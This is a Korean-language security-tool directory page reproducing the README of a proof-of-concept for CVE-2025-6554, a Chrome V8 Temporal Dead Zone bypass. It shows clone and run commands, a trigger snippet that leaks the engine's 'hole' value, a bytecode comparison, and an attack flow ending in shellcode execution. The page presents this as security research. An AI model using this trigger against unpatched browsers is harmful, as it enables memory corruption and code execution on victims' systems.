Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-6554 — CVE-2025-6554 PoC | Kitploit
도구/GitHubGitHub/lordbheem/cve-2025-6554
Vulnerability AnalysisExploitationShellcodeWeb Application ExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHublordbheem/cve-2025-6554

CVE-2025-6554

CVE-2025-6554 PoC

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-6554 취약점 개념 증명

License Security V8 Engine

⚠️ 보안 연구 프로젝트 - 이 프로젝트는 보안 연구 및 교육 목적으로만 사용하세요. 프로덕션 환경에서 사용하지 마십시오.

📋 프로젝트 개요

CVE-2025-6554는 Chrome V8 엔진의 심각한 취약점으로, JavaScript의 "Temporal Dead Zone"(TDZ) 검사 메커니즘과 관련이 있습니다. 이 프로젝트는 완전한 취약점 개념 증명 코드와 데모 도구를 제공합니다.

🔍 취약점 설명

이 취약점은 V8 엔진이 선택적 체이닝 연산자(?.)를 처리할 때 변수 초기화 여부를 올바르게 확인하지 않아, 선언되지 않은 변수에 접근할 수 있고 TDZ 보호 메커니즘을 우회할 수 있습니다.

🎯 영향 범위

  • 유형 혼동 공격
  • 스택 조작
  • 스코프 검사 우회
  • 메모리 누수

🚀 빠른 시작

환경 요구 사항

  • Node.js 16+ 또는 Chrome V8 디버그 버전
  • 최신 브라우저(Chrome/Edge/Firefox)

설치 단계

  1. 저장소 클론
root@kitploit:~
git clone https://github.com/9Insomnie/CVE-2025-6554.git
cd CVE-2025-6554
  1. 파일 구조 확인
root@kitploit:~
CVE-2025-6554/
├── Exploit.js              # 原始漏洞利用代码  
├── Test-Exploit.js         # 测试版本
├── poc.html                # 检测文件
├── README.md               # 项目说明
└── 使用说明.md             # 详细使用指南

🛠️ 사용 방법

방법 1: V8 디버그 버전 사용

root@kitploit:~
# 使用V8的d8调试器运行
c:\path\to\v8\out\x64.debug\d8 --allow-natives-syntax --print-bytecode Exploit.js

방법 2: Node.js 사용

root@kitploit:~
# 运行测试版本
node Test-Exploit.js

# 或运行原始利用代码
node Exploit.js

방법 3: 브라우저 테스트

HTML 파일을 브라우저에서 직접 열어 테스트합니다(관련 기능 지원 필요).

🔬 기술 세부 사항

취약점 원리

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;  // 使用未声明的变量y
    return y;           // 应该抛出ReferenceError
    let y;              // y在这里才声明
}

바이트코드 비교

패치 전:

root@kitploit:~
0x32600100133 @   11 : b6 00             ThrowReferenceErrorIfHole [0]

패치 후:

root@kitploit:~
0x29f00100133 @   11 : b6 00             ThrowReferenceErrorIfHole [0]
0x29f00100144 @   28 : b6 00             ThrowReferenceErrorIfHole [0]  // 新增检查

공격 흐름

  1. 취약점 트리거 → delete x?.[y]?.a
  2. TDZ 우회 → 초기화되지 않은 변수 접근
  3. 메모리 누수 → "The Hole" 값 캡처
  4. 유형 혼동 → 메모리 주소 활용
  5. 코드 실행 → 셸코드 실행

📊 테스트 결과

예상 동작

  • 패치 전: "The Hole" 값을 성공적으로 캡처할 수 있음
  • 패치 후: ReferenceError를 던져 접근 차단

검증 방법

root@kitploit:~
# 检查漏洞是否存在
node Test-Exploit.js

# 查看详细字节码
d8 --allow-natives-syntax --print-bytecode Exploit.js

🔒 보안 주의 사항

⚠️ 중요 알림

  1. 연구 전용 - 이 프로젝트는 보안 연구 및 취약점 검증에만 사용하세요.
  2. 악의적인 사용 금지 - 시스템을 공격하거나 손상시키는 데 사용하지 마세요.
  3. 교육 목적 - 주로 JavaScript 엔진 보안 메커니즘 이해를 위해 사용됩니다.
  4. 환경 격리 - 격리된 환경에서 테스트하는 것이 좋습니다.

🛡️ 보호 권장 사항

  • Chrome 브라우저를 즉시 업데이트하세요.
  • 보안 샌드박스를 활성화하세요.
  • 비정상적인 동작을 모니터링하세요.
  • 최신 버전의 V8 엔진을 사용하세요.

📚 기술 문서

관련 리소스

  • V8 엔진 공식 문서
  • CVE-2025-6554 상세 정보
  • JavaScript 엔진 보안 연구

연구 배경

이 취약점은 보안 연구원에 의해 발견되었으며, V8 엔진의 TDZ 검사 메커니즘과 관련이 있습니다. 선택적 체이닝 연산자를 통해 공격자는 변수 초기화 검사를 우회하고 메모리 제어권을 얻을 수 있습니다.

📄 라이선스

이 프로젝트는 MIT 라이선스를 적용합니다. 자세한 내용은 LICENSE 파일을 참조하세요.

🙏 감사의 말

  • V8 엔진 팀
  • Chrome 보안 팀
  • 보안 연구에 참여한 모든 분들

⚠️ 면책 조항: 이 프로젝트는 보안 연구 및 교육 목적으로만 사용됩니다. 사용자는 사용에 따른 위험을 스스로 부담하며, 저자는 어떠한 법적 책임도 지지 않습니다.

🔒 보안 보고: 새로운 보안 문제를 발견하시면 GitHub Issues를 통해 연락해 주세요.

도구 다운로드